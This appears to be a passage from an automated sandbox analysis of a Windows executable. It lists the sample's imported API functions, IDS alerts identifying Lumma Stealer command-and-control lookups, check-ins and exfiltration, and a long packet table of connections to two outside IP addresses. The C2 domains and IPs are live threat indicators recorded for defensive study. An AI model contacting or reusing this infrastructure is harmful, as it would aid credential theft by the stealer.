                                                              RT_GROUP_ICON0xf6abc0x14dataEnglishUnited States1.1
                                                              RT_VERSION0xf6ad00x198OpenPGP Public KeyEnglishUnited States0.571078431372549
                                                              RT_MANIFEST0xf6c680x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                              DLLImport
                                                              KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                              USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                              SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                              ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                              VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishUnited States
                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-10-30T15:44:31.098506+01002057095ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (servicedny .site)1192.168.2.6509011.1.1.153UDP
                                                              2024-10-30T15:44:31.349697+01002057093ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seallysl .site)1192.168.2.6606401.1.1.153UDP
                                                              2024-10-30T15:44:31.363808+01002057089ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (opposezmny .site)1192.168.2.6576321.1.1.153UDP
                                                              2024-10-30T15:44:31.379405+01002057085ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (goalyfeastz .site)1192.168.2.6646021.1.1.153UDP
                                                              2024-10-30T15:44:32.022745+01002057086ET MALWARE Observed Win32/Lumma Stealer Related Domain (goalyfeastz .site in TLS SNI)1192.168.2.649985172.67.145.203443TCP
                                                              2024-10-30T15:44:32.514446+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649985172.67.145.203443TCP
                                                              2024-10-30T15:44:32.514446+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649985172.67.145.203443TCP
                                                              2024-10-30T15:44:33.190335+01002057086ET MALWARE Observed Win32/Lumma Stealer Related Domain (goalyfeastz .site in TLS SNI)1192.168.2.649986172.67.145.203443TCP
                                                              2024-10-30T15:44:33.660248+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649986172.67.145.203443TCP
                                                              2024-10-30T15:44:33.660248+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649986172.67.145.203443TCP
                                                              2024-10-30T15:44:34.544726+01002057086ET MALWARE Observed Win32/Lumma Stealer Related Domain (goalyfeastz .site in TLS SNI)1192.168.2.649987172.67.145.203443TCP
                                                              2024-10-30T15:44:35.708121+01002057086ET MALWARE Observed Win32/Lumma Stealer Related Domain (goalyfeastz .site in TLS SNI)1192.168.2.649988172.67.145.203443TCP
                                                              2024-10-30T15:44:37.421979+01002057086ET MALWARE Observed Win32/Lumma Stealer Related Domain (goalyfeastz .site in TLS SNI)1192.168.2.649989172.67.145.203443TCP
                                                              2024-10-30T15:44:38.811675+01002057086ET MALWARE Observed Win32/Lumma Stealer Related Domain (goalyfeastz .site in TLS SNI)1192.168.2.649990172.67.145.203443TCP
                                                              2024-10-30T15:44:39.273137+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649990172.67.145.203443TCP
                                                              2024-10-30T15:44:39.885987+01002057086ET MALWARE Observed Win32/Lumma Stealer Related Domain (goalyfeastz .site in TLS SNI)1192.168.2.649991172.67.145.203443TCP
                                                              2024-10-30T15:44:41.096945+01002057086ET MALWARE Observed Win32/Lumma Stealer Related Domain (goalyfeastz .site in TLS SNI)1192.168.2.649992172.67.145.203443TCP
                                                              2024-10-30T15:44:42.211836+01002057086ET MALWARE Observed Win32/Lumma Stealer Related Domain (goalyfeastz .site in TLS SNI)1192.168.2.649993172.67.145.203443TCP
                                                              2024-10-30T15:44:43.297089+01002057086ET MALWARE Observed Win32/Lumma Stealer Related Domain (goalyfeastz .site in TLS SNI)1192.168.2.649994172.67.145.203443TCP
                                                              2024-10-30T15:44:43.750650+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649994172.67.145.203443TCP
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Oct 30, 2024 15:44:31.402551889 CET49985443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:31.402631044 CET44349985172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:31.402724028 CET49985443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:31.405836105 CET49985443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:31.405858994 CET44349985172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:32.022587061 CET44349985172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:32.022744894 CET49985443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:32.024600983 CET49985443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:32.024612904 CET44349985172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:32.024864912 CET44349985172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:32.074982882 CET49985443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:32.079988956 CET49985443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:32.079988956 CET49985443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:32.080130100 CET44349985172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:32.514437914 CET44349985172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:32.514559031 CET44349985172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:32.514625072 CET49985443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:32.516701937 CET49985443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:32.516719103 CET44349985172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:32.571798086 CET49986443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:32.571899891 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:32.572082996 CET49986443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:32.572284937 CET49986443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:32.572326899 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.190246105 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.190335035 CET49986443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:33.191973925 CET49986443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:33.192013979 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.192348957 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.193569899 CET49986443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:33.193623066 CET49986443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:33.193669081 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.660267115 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.660329103 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.660363913 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.660407066 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.660403967 CET49986443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:33.660475016 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.660516024 CET49986443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:33.660563946 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.660628080 CET49986443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:33.660646915 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.660897017 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.660937071 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.661106110 CET49986443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:33.661122084 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.661183119 CET49986443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:33.777374029 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.777451992 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.777503967 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.777522087 CET49986443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:33.777538061 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.777597904 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.777640104 CET49986443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:33.777697086 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.777749062 CET49986443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:33.777889967 CET49986443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:33.777930021 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.777956009 CET49986443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:33.777971029 CET44349986172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.807931900 CET49987443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:33.807992935 CET44349987172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:33.808072090 CET49987443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:33.808352947 CET49987443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:33.808368921 CET44349987172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:34.544640064 CET44349987172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:34.544725895 CET49987443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:34.546602964 CET49987443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:34.546617031 CET44349987172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:34.546942949 CET44349987172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:34.548403025 CET49987443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:34.548577070 CET49987443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:34.548609018 CET44349987172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:35.073137045 CET44349987172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:35.073268890 CET44349987172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:35.073379993 CET49987443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:35.073708057 CET49987443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:35.073731899 CET44349987172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:35.089554071 CET49988443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:35.089593887 CET44349988172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:35.089674950 CET49988443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:35.089960098 CET49988443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:35.089976072 CET44349988172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:35.708029985 CET44349988172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:35.708121061 CET49988443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:35.710968018 CET49988443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:35.710978985 CET44349988172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:35.711323023 CET44349988172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:35.712474108 CET49988443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:35.712615013 CET49988443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:35.712656021 CET44349988172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:35.712712049 CET49988443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:35.712719917 CET44349988172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:36.466659069 CET44349988172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:36.466770887 CET44349988172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:36.466856003 CET49988443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:36.467097044 CET49988443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:36.467117071 CET44349988172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:36.541524887 CET49989443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:36.541563988 CET44349989172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:36.541677952 CET49989443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:36.542046070 CET49989443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:36.542058945 CET44349989172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:37.421816111 CET44349989172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:37.421978951 CET49989443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:37.448329926 CET49989443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:37.448349953 CET44349989172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:37.448672056 CET44349989172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:37.450273037 CET49989443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:37.450555086 CET49989443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:37.450577974 CET44349989172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:37.450633049 CET49989443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:37.450639009 CET44349989172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:38.113867998 CET44349989172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:38.114001989 CET44349989172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:38.114078045 CET49989443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:38.116168976 CET49989443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:38.116189957 CET44349989172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:38.194308996 CET49990443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:38.194344997 CET44349990172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:38.194446087 CET49990443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:38.194797993 CET49990443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:38.194814920 CET44349990172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:38.811604977 CET44349990172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:38.811675072 CET49990443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:38.813169003 CET49990443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:38.813179970 CET44349990172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:38.813493013 CET44349990172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:38.814626932 CET49990443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:38.814726114 CET49990443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:38.814768076 CET44349990172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:39.273139000 CET44349990172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:39.273257017 CET44349990172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:39.273323059 CET49990443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:39.273469925 CET49990443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:39.273484945 CET44349990172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:39.282275915 CET49991443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:39.282311916 CET44349991172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:39.282383919 CET49991443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:39.282706976 CET49991443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:39.282717943 CET44349991172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:39.885803938 CET44349991172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:39.885987043 CET49991443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:39.887507915 CET49991443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:39.887514114 CET44349991172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:39.887813091 CET44349991172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:39.889094114 CET49991443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:39.889370918 CET49991443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:39.889406919 CET44349991172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:40.376058102 CET44349991172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:40.376194954 CET44349991172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:40.376305103 CET49991443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:40.376465082 CET49991443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:40.376477957 CET44349991172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:40.478426933 CET49992443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:40.478458881 CET44349992172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:40.478521109 CET49992443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:40.478847027 CET49992443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:40.478864908 CET44349992172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:41.096831083 CET44349992172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:41.096945047 CET49992443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:41.098248005 CET49992443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:41.098259926 CET44349992172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:41.098495960 CET44349992172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:41.099694014 CET49992443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:41.099787951 CET49992443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:41.099796057 CET44349992172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:41.564413071 CET44349992172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:41.564511061 CET44349992172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:41.564557076 CET49992443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:41.564650059 CET49992443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:41.564666033 CET44349992172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:41.610400915 CET49993443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:41.610493898 CET44349993172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:41.610586882 CET49993443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:41.610877991 CET49993443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:41.610915899 CET44349993172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:42.211700916 CET44349993172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:42.211836100 CET49993443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:42.213321924 CET49993443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:42.213339090 CET44349993172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:42.213581085 CET44349993172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:42.214764118 CET49993443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:42.214865923 CET49993443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:42.214874029 CET44349993172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:42.680257082 CET44349993172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:42.680344105 CET44349993172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:42.680430889 CET49993443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:42.680535078 CET49993443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:42.680577993 CET44349993172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:42.683641911 CET49994443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:42.683679104 CET44349994172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:42.683758974 CET49994443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:42.684062004 CET49994443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:42.684077978 CET44349994172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:43.296996117 CET44349994172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:43.297089100 CET49994443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:43.298342943 CET49994443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:43.298353910 CET44349994172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:43.298585892 CET44349994172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:43.299674988 CET49994443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:43.299719095 CET49994443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:43.299751997 CET44349994172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:43.750672102 CET44349994172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:43.751002073 CET44349994172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:43.751059055 CET49994443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:43.751247883 CET49994443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:43.751271963 CET44349994172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:43.751283884 CET49994443192.168.2.6172.67.145.203
                                                              Oct 30, 2024 15:44:43.751290083 CET44349994172.67.145.203192.168.2.6
                                                              Oct 30, 2024 15:44:43.753113985 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:43.758677006 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:43.758750916 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:43.758893013 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:43.764437914 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.257751942 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.257778883 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.257793903 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.257869959 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.257882118 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.257901907 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.257924080 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.257931948 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.257936954 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.257950068 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.257956982 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.257963896 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.257977962 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.257991076 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.257992983 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.258028984 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.258137941 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.258178949 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.263705969 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.263765097 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.266146898 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.266165972 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.266201019 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.268950939 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.269056082 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.269104004 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.271398067 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.271419048 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.271461964 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.274322033 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.274341106 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.274358034 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.274384975 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.276669025 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.276699066 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.276717901 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.279680014 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.279710054 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.279737949 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.281904936 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.281929970 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.281965017 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.284895897 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.284920931 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.284941912 CET4999580192.168.2.6147.45.47.81
